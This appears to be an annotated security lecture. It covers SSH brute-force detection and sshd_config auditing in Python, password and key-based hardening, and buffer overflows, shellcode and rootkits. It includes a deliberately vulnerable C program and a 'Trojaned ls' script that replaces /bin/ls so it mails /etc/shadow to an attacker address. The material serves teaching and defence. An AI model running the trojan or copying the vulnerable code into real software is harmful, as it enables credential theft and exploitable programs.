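    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def failed_logins(lines, year=2008):
    """{ip: [(timestamp, user), ...]} for every 'Failed password' line."""
    out = defaultdict(list)
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            out[m["ip"]].append((parse_ts(m["ts"], year), m["user"]))
    return dict(out)

def brute_force_sources(lines, min_failures=3, window_seconds=300, year=2008):
    """Sources with at least `min_failures` failures inside any `window_seconds` span,
    mapped to the sorted set of usernames they tried."""
    flagged = {}
    for ip, events in failed_logins(lines, year).items():
        events.sort()
        times = [t for t, _ in events]
        for i in range(len(times) - min_failures + 1):
            if (times[i + min_failures - 1] - times[i]).total_seconds() <= window_seconds:
                flagged[ip] = sorted({u for _, u in events})
                break
    return flagged

def username_histogram(lines, year=2008):
    """How often each username was tried (the distribution the slides chart)."""
    return Counter(u for events in failed_logins(lines, year).values() for _, u in events)

# Constructed sample: the slide's lines for 89.235.152.18 plus one benign failure from TEST-NET.
SAMPLE_AUTH_LOG = """\
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 09:10:05 golden-laptop sshd[24102]: Failed password for alice from 192.0.2.7 port 50111 ssh2
Dec 24 09:10:20 golden-laptop sshd[24102]: Accepted publickey for alice from 192.0.2.7 port 50111 ssh2
""".splitlines()

if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_AUTH_LOG))
    print(username_histogram(SAMPLE_AUTH_LOG))
```

Run it over `/var/log/auth.log` with the file's year; three failures in five minutes is a deliberately low threshold that catches the slow scanners, and the username set per source tells a dictionary run (oracle, test, cvsuser) apart from one user mistyping their own password.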

SSH

Defence:
- IPTables
- Stronger passwords
- RSA authentication

SSH

- Passwords of at least 8 characters
- Non-trivial passwords
- Alphanumeric combinations
- Mnemonic: "Um Whiskey-Cola vale 3 euros no BA!" ("A Whiskey-Cola costs 3 euros at the BA!") = "UW-Cv3enBA!"

SSH

http://www.passwordmeter.com/

SSH - RSA authentication

1. Generate the key pair with the command "ssh-keygen -t rsa". This creates the files ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
2. On each machine we want to connect to (destination), place the generated "id_rsa.pub" in ~/.ssh/authorized_keys by appending its contents, for example: "cat id_rsa.pub >> ~/.ssh/authorized_keys".
3. On each machine we want to connect from (origin), place "id_rsa" in ~/.ssh/.
4. All that remains is to disable password-based login by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config and then restarting the "sshd" daemon with "/etc/init.d/sshd restart".
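A check for step 4 that catches the usual way it goes wrong. sshd_config(5) states that for each keyword the first obtained value is used, so a `PasswordAuthentication no` appended to the end of a file that already contains `PasswordAuthentication yes` (as distribution defaults often do) has no effect, and password logins stay open. The audit below is an added example written for this page, not code from the presentation or from OpenSSH: it reads the global section of an sshd_config the way sshd does (case-insensitive keywords, `#` comment lines, first value wins, stop at the first `Match` block since those lines apply conditionally) and reports whether the effective settings give key-only login. Both sample configurations are constructed.

```python
import re

# sshd_config(5): keywords are case-insensitive, '#' lines are comments, and for each
# keyword the FIRST obtained value wins. Lines after a Match block apply conditionally,
# so this audit stops reading there.
KEYVAL_RE = re.compile(r"^(?P<key>[A-Za-z]+)(?:\s*=\s*|\s+)(?P<value>.+)$")

def effective_settings(config_text):
    """{keyword_lower: first value} for the global section of an sshd_config."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYVAL_RE.match(line)
        if not m:
            continue
        key = m["key"].lower()
        if key == "match":
            break
        settings.setdefault(key, m["value"].strip())
    return settings

def audit_key_only_login(config_text):
    """Findings for the hardening the slide describes: public-key login only, no passwords."""
    s = effective_settings(config_text)
    findings = []
    pw = s.get("passwordauthentication", "yes").lower()  # sshd's default is yes
    if pw != "no":
        findings.append(f"PasswordAuthentication effective value is '{pw}', expected 'no'")
    pk = s.get("pubkeyauthentication", "yes").lower()  # sshd's default is yes
    if pk != "yes":
        findings.append(f"PubkeyAuthentication effective value is '{pk}', expected 'yes'")
    return findings

# Constructed samples. The first mimics a distribution default that already sets "yes",
# with the slide's line appended at the end; the second puts the hardening line first.
APPENDED_ONLY = """\
# Authentication:
PasswordAuthentication yes
PubkeyAuthentication yes
UsePAM yes
# line added as the slide suggests, but the earlier value is the one sshd uses
PasswordAuthentication no
"""

CORRECTED = """\
# Authentication:
PubkeyAuthentication yes
PasswordAuthentication no
UsePAM yes
"""

if __name__ == "__main__":
    print("appended only:", audit_key_only_login(APPENDED_ONLY) or "ok")
    print("corrected:", audit_key_only_login(CORRECTED) or "ok")
```

After editing, `sshd -T` prints the effective configuration and is the authoritative check; the script above is useful when auditing many hosts' files without a shell on each.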

Vulnerabilities

Unforeseen behaviour in a software artefact:
- Buffer overflow
- Unvalidated input
- SQL injection

Exploitation of vulnerabilities

Exploit: the name given to a piece of code that exploits flaws in applications so as to cause behaviour in them that was not anticipated.

    /* The presentation's deliberately vulnerable example: no bounds check on the
       copy into a 10-byte buffer, and the user string is passed as the format. */
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        char buffer[10];
        strcpy(buffer, argv[1]);
        printf(buffer);
        return 0;
    }

Buffer Overflow

    user@honeypot:~$ gcc exploit.c -o exploit
    user@honeypot:~$ ./exploit thisisanexploit
    *** stack smashing detected ***: ./exploit terminated
    thisisanexploitAborted

- One of gcc's defence mechanisms (the stack protector) aborted the program

ShellCode

A set of instructions (in machine code or otherwise) written so that they can be injected into an application at run time.

- Illegal access to an unauthorised region of memory
- Injection of the shellcode

RootKits

- A set of malicious programs (trojans, backdoors, ...)
- Detection: chkrootkit and rkhunter (Linux) [1]; RootkitRevealer (Windows).

[1] Both are available from Ubuntu's package manager.

Trojaned ls

    #!/bin/bash
    mv /bin/ls /bin/ls.old
    /bin/echo "cat /etc/shadow | mail intruso@intruso.pt" > /bin/ls
    /bin/echo "/bin/ls.old" >> /bin/ls
    chmod +x /bin/ls

Conclusion
